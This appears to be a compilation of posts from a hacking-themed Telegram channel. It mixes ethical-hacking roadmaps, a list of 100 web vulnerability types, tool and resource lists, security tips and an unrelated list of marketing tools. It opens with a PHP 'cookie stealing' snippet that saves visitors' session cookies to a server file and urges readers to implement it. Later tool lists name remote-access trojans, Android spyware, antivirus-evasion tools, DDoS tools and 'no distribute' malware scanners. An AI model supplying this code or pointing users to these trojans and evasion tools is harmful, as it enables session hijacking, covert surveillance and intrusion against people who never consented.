CyberSecurity & AI Experts
Ethical Hacking and Cyber Security Official Telegram Channel
Free content to learn Hacking & AI

COOKIE STEALING CODE IN PHP STORES ON CPANEL

<?php
// Steal the user's cookies
if (isset($_COOKIE['user'])) {
    //store in file
    $cookie = json_encode($_COOKIE['user']);
    $filename = 'stolen_cookies_' . date('m_d_Y') . '.txt';
    file_put_contents('/filemanager/'. $filename, $cookie);
}
?>

USE YOUR BRAIN NOW TO IMPLEMENT ON YOUR STUFF

How Do I Protect My Computer From Bots?

It's Very Possible To Protect Your Computer From Bots, But It Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe:

- Install Firewalls To Block Malicious Attacks And Never Turn Them Off.

- Use A Long And Complicated Password That Contains Numbers And Symbols.

- Never Use The Same Password For Multiple Programs.

- Install Quality Anti-Malware Software Such As Norton Security To Protect Your Device.

- Ensure Software Is Up To Date, And Never Ignore System Updates.

- Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.

100 Web Vulnerabilities, categorized into various types:

Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)


Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse


Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling


Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration


XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb


Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control


Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection


API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation


Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols


Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues


Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service


Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse


Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering


IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities


Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues


Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass


Server-Side Request Forgery (SSRF):
87. Blind SSRF
88. Time-Based Blind SSRF


Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass


Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws


Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits


If you want to become a hacker, it is essential to always know which steps to take

1-Network Plus
2-CEH
3-Linux Commands
4-Cmd Commands
5-Windows Tools
6-Kali Linux Tools
7-Learning PHP
8-Learning Python
9-Learning Ruby
10-Learning Perl
...
#exploithub

1-DDoS
2-Forensics
3-Programming
4-Exploitation
5-Phone Hacking
6-Server Hacking
7-Client Hacking
8-Website Hacking
9-Network Hacking
10-Wireless Hacking
11-Reverse Engineering
12-Information Gathering

#DDoS
1-MDK3
2-LOIC
3-HULK
4-DDOSIM
5-Ufonet
6-Hping3
7-Xerxes
8-Hammer
9-Slowloris
10-Websploit
11-GoldenEye
12-Metasploit
13-Aireplay-ng
14-Slowhttptest

#Forensics
1-COFEE
2-Volafox
3-Autopsy
4-Foremost
5-Hashdeep
6-Binwalk

#Programming
1-Notepad++
2-Visual Studio
3-Text Editor

#Exploitation
1-Metasploit
2-Sqlmap
3-Core Impact
4-W3af
5-BeEF
6-Dradis

#Phone_Hacking
1-Metasploit
2-Apktool
3-Droidjack
4-AndroRAT
5-Spynote

#Server_Hacking
1-SQLmap
2-Jsql
3-Havij
4-Hydra
5-Metasploit
6-Armitage
7-Burpsuite
8-Owasp-ZAP
9-Netsparker
10-Acunetix
11-OpenVAS

#Client_Hacking
1-Darkcomet
2-FatRat
3-Veil-Evasion
4-Shellter
5-Unicorn
6-Setoolkit
7-Armitage
8-BeEF-Framework
9-EmPyre
10-FakeImageExploiter
11-Pupy
12-DFU-Programmer
13-Cobalt Strike
14-Exploitpack
15-Gcat
16-Crowbar

#Website_Hacking
1-Sn1per
2-Owasp-ZAP
3-Burpsuite
4-Netsparker
5-Acunetix
6-SQLmap
7-Xsser
8-WPScan
9-Joomrra
10-Joomscan
11-WPSeku
12-XSStrike
13-Kadimus
14-jexboss
15-CMSmap
16-brut3k1t
17-0d1n
18-CloudFail
19-Arachni
20-Nikto
21-Webscarab
22-Nmap
23-Vbscan
24-Sentry MBA

#Network_Hacking
1-MITMf
2-Bettercap
3-Ettercap
4-Tcpdump
5-Wireshark
6-Driftnet
7-SSLstrip
8-Armitage
9-Metasploit
10-Xerosploit
11-Sparta
12-Hydra

#Wireless_Hacking
1-Wifite
2-Airodump-ng
3-Aireplay-ng
4-Wash
5-WiFi Pumpkin
6-Wifiphisher
7-Fluxion
8-Infernal Twin
9-WPSpin

#Reverse_Engineering
1-OWASP-ZSC
2-OllyDBG
3-Apktool

#Information_Gathering
1-Enum
2-Recon
3-Whois
4-Email Contact
5-Phone Contact
6-Service Status
7-Protocol Analysis
ONE PROBLEM, ONE TOOL

PROBLEMS - TOOLS
1. Graphic Design - Canva
2. Subtitles - Blink
3. Digital Store - Gumroad
4. Link in Bio - Stan store
5. Payment Gateway - Wise
6. Profile Picture - Pfpmaker
7. IG Automation - Manychat
8. Email Marketing - ConvertKit
9. Design Anything - Gen Al Firefly
10. Viral Analytics - ViralFindr
11. Digital Products - Product hunt
12. Logo - Lookadesign
13. Content Idea - ChatGPT
18 most used Linux commands YOU MUST KNOW

- ls
- mv
- ssh
- cd
- cat
- sudo
- pwd
- grep
- top
- mkdir
- find
- wget
- rm
- chmod
- tar
- cp
- chown
- gzip
18 Websites To Learn Linux For FREE

1. nixCraft
2. Tecmint
3. Linuxize
4. It's FOSS
5. Linux Hint
6. LinuxOPsys
7. Linux Journey
8. Linux Academy
9. Linux Survival
10. Linux Command
11. Ryan's Tutorials
12. Linux Handbook
13. Linux FoundationX
14. LabEx Linux For Noobs
15. Guru99 Linux Tutorial Summary
16. Conquering the command line
17. Intellipaat Linux Tutorial for Beginners
18. The Debian Administrator's Handbook

Here are 27 ways to learn ethical hacking for free:

1. Root Me - Challenges.
2. Stök's YouTube - Videos.
3. Hacker101 Videos - Videos.
4. InsiderPhD YouTube - Videos.
5. EchoCTF - Interactive Learning.
6. Vuln Machines - Videos and Labs.
7. Try2Hack - Interactive Learning.
8. Pentester Land - Written Content.
9. Checkmarx - Interactive Learning.
10. Cybrary - Written Content and Labs.
11. RangeForce - Interactive Exercises.
12. Vuln Hub - Written Content and Labs.
13. TCM Security - Interactive Learning.
14. HackXpert - Written Content and Labs.
15. Try Hack Me - Written Content and Labs.
16. OverTheWire - Written Content and Labs.
17. Hack The Box - Written Content and Labs.
18. CyberSecLabs - Written Content and Labs.
19. Pentester Academy - Written Content and Labs.
20. Bug Bounty Reports Explained YouTube - Videos.
21. Web Security Academy - Written Content and Labs.
22. Securibee's Infosec Resources - Written Content.
23. Jhaddix Bug Bounty Repository - Written Content.
24. Zseano's Free Bug Bounty Methodology - Free Ebook.
25. Awesome AppSec GitHub Repository - Written Content.
26. NahamSec's Bug Bounty Beginner Repository - Written Content.
27. Kontra Application Security Training - Interactive Learning.
How to Become an Ethical Hacker in 2024

1. Develop a Strong Foundation in Computer Science and Programming:

Master a programming language like Python, Java, or C++. These languages are widely used in cybersecurity tools and scripts.

Understand computer networking concepts like TCP/IP, network protocols, and routing mechanisms.

Familiarize yourself with operating systems, including Linux, Windows, and macOS, as you'll be interacting with various systems during ethical hacking.

2. Learn Cybersecurity Fundamentals:

Grasp the principles of cryptography, encryption techniques, and hashing algorithms.

Understand vulnerability assessment and penetration testing (VAPT) methodologies.

Familiarize yourself with common security threats, attack vectors, and exploit techniques.

Explore web application security concepts, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF).

3. Enroll in Ethical Hacking Courses and Certifications:

Consider pursuing certifications like Certified Ethical Hacker (CEH) or CompTIA Penetration Testing+ (PT+) to validate your skills and knowledge.

Participate in online courses or bootcamps offered by reputable institutions to gain hands-on experience and practical skills.

Engage in virtual labs and Capture the Flag (CTF) competitions to test your skills and practice ethical hacking techniques.

4. Join Online Communities and Engage with Experts:

Engage in online forums, discussion groups, and communities dedicated to ethical hacking.

Connect with experienced hackers and cybersecurity professionals to seek guidance and mentorship.

Participate in workshops, conferences, and networking events to expand your knowledge and connections.

5. Contribute to Open-Source Projects and Build a Portfolio:

Contribute to open-source security projects to gain real-world experience and demonstrate your skills.

Participate in bug bounty programs to identify and report vulnerabilities in various systems.

Build a personal portfolio showcasing your ethical hacking projects, certifications, and contributions.

6. Stay Updated with the Latest Cybersecurity Trends:

Continuously read industry news, blogs, and research papers to keep abreast of emerging threats and vulnerabilities.

Participate in online webinars, workshops, and training sessions to stay updated on the latest hacking techniques and tools.

Attend cybersecurity conferences and events to network with experts and learn about cutting-edge technologies.
Well Known TCP/UDP Ports
30 Days Roadmap to learn Ethical Hacking

Day 1-3: Introduction to Ethical Hacking
- Understand the basics of ethical hacking and its importance
- Learn about different types of hackers and their motivations
- Explore the legal and ethical considerations of ethical hacking

Day 4-7: Networking Fundamentals
- Learn about networking protocols, IP addresses, and subnets
- Understand how data is transmitted over networks
- Explore common network vulnerabilities and how to secure them

Day 8-10: Information Gathering and Footprinting
- Learn how to gather information about a target system or network
- Explore techniques such as passive information gathering and footprinting
- Understand the importance of reconnaissance in ethical hacking

Day 11-14: Scanning and Enumeration
- Learn how to scan for open ports and services on a target system
- Understand the concept of enumeration and its role in ethical hacking
- Explore tools such as Nmap for scanning and enumeration

Day 15-17: Vulnerability Assessment and Exploitation
- Learn how to identify and assess vulnerabilities in a target system
- Understand common exploitation techniques and tools used in ethical hacking
- Explore how to exploit vulnerabilities responsibly and ethically

Day 18-21: Web Application Security
- Learn about common web application vulnerabilities (e.g., SQL injection, XSS)
- Understand how to secure web applications against attacks
- Explore tools such as Burp Suite for web application testing

Day 22-24: Wireless Network Security
- Learn about common wireless network vulnerabilities and attacks
- Understand how to secure wireless networks against intruders
- Explore tools such as Aircrack-ng for wireless network penetration testing

Day 25-27: Social Engineering and Physical Security
- Learn about social engineering techniques used in ethical hacking
- Understand the importance of physical security in cybersecurity
- Explore ways to protect against social engineering attacks

Day 28-30: Penetration Testing and Reporting
- Learn how to conduct penetration tests on systems and networks
- Understand the methodology of penetration testing (e.g., reconnaissance, scanning, exploitation, reporting)
- Practice conducting penetration tests on virtual environments and create detailed reports on findings

Remember to practice your skills in a controlled environment and always seek permission before performing any ethical hacking activities. Additionally, consider obtaining relevant certifications such as Certified Ethical Hacker (CEH) to validate your skills in ethical hacking.

Some good resources to learn Ethical Hacking

1. Tutorials & Courses
   - Information Security Free Course
   - Ethical Hacking Bootcamp
   - Network Hacking Course

2. Telegram Channels
   - Cyber Security and Ethical Hacking
   - Ethical Hacking Books

3. Books
   - Ultimate Linux Free Book
   - Python for Ethical Hacking

4. Ethical Hacking Forums

ENJOY LEARNING
Hacking manuals:

- http://www.ehacking.net/
- http://www.securitytube.net/
- http://www.hacking-tutorial.com/
- https://hackproofhacks.com
- https://www.offensive-security.com/
- http://breakthesecurity.cysecurity.org/
- http://www.spacerogue.net/wordpress/
- https://www.youtube.com/user/Hak5Darren
- https://www.youtube.com/user/sansinstitute
- https://vimeo.com/channels/fullscopesecurity
- http://www.kalitutorials.net/2013/08/kali-linux.html
- https://www.youtube.com/user/DEFCONConference
- https://en.wikibooks.org/wiki/Metasploit/VideoTutorials

Antiviruses:
- http://fuckingscan.me/
- http://v2.scan.majyx.net/
- http://nodistribute.com/
- http://www.file2scan.net/
- https://t.me/hackingtipp
- http://anubis.iseclab.org/
- https://anonscanner.com/
- http://virusscan.jotti.org/it
- https://www.virustotal.com/nl/

Services for working with IP:
- http://ip-api.com/
- http://ipaddress.com
- http://whatstheirip.com
- http://www.whatismyip.com/
- https://t.me/hackingtipp
- http://www.ip2location.com/demo
- http://www.my-ip-neighbors.com/
- http://freegeoip.net/static/index.html
- http://www.ip-adress.com/ipaddresstolocation/

CyberSecurity Tips 2024

1. Think Before Clicking: Be careful with links, especially in emails and messages, as they could be traps set by hackers.

2. Strong and Unique Passwords: Use different passwords for each account and make them strong by mixing uppercase, lowercase, numbers, and symbols.

3. Password Manager: Use a password manager to keep track of all your passwords securely.

4. Two-factor Authentication (2FA): Add extra layers of security, like codes or fingerprints, to your login process.

5. Stay Updated with CERT-In: Keep an eye on CERT-In updates to stay informed about cybersecurity threats.

6. Keep Software Updated: Regularly update your software, browsers, and operating systems to patch vulnerabilities.

7. Use Firewalls and Anti-viruses: Protect your systems from various cyber threats like malware and viruses by using updated anti-virus software and firewalls.

8. Avoid Online Debit Card Use: When making online transactions, avoid using cards directly linked to your bank account for added security. Opt for safer payment methods like PayPal or credit cards.

9. Learn About Phishing Attacks: Be wary of phishing emails or messages that trick you into giving away personal information. Avoid clicking on suspicious links or opening attachments from unknown senders.

10. Avoid Unfamiliar Websites: Be cautious when visiting new websites, especially those shared by unknown sources, as they could contain harmful malware.

11. Avoid Useless Downloads: Limit downloads to essential software and browser extensions. Always opt for custom installations and decline any additional add-ons during the process.

12. Stay Cautious on Social Media: Limit the amount of personal information shared on social media platforms to prevent hackers from accessing sensitive data.

13. Regularly Backup Your Data: Create backups of your files and network data to mitigate loss from cyber attacks or data breaches.

14. Use VPN on Public WiFi: When using public WiFi, use a Virtual Private Network (VPN) to encrypt your device's traffic and enhance security against hackers.

15. Secure Your Data: Stay vigilant and educated about cybersecurity threats to safeguard your personal data and systems. Consider enrolling in a cybersecurity program to deepen your understanding of this field.

Most Common Abbreviations

Wi-Fi – Wireless Fidelity
RAM – Random Access Memory
ROM – Read Only Memory
USB – Universal Serial Bus
HTML – Hyper Text Markup Language
WWW – World Wide Web
ISP – Internet Service Provider
FAQ – Frequently Asked Questions
Some of the Most Common Acronyms You Need To Know.
What is the difference between the dark web and the deep web?

- The terms "dark web" and "deep web" are often used interchangeably, but they are not the same. Rather, the dark web is a small, less accessible part of the deep web.

- Both the dark and deep web share one thing in common: Neither can be found in search engine results. The difference between them primarily lies in how their content is accessed. Deep web pages can be accessed by anyone with a standard web browser who knows the URL.

- Dark web pages, in contrast, require special software with the correct decryption key, as well as access rights and knowledge of where to find the content.

- If you imagine the web in three layers, at the very top would be the surface web, whose content is indexed by search engines like Google and Yahoo. Beneath it is the deep web, and then located underneath that is the dark web.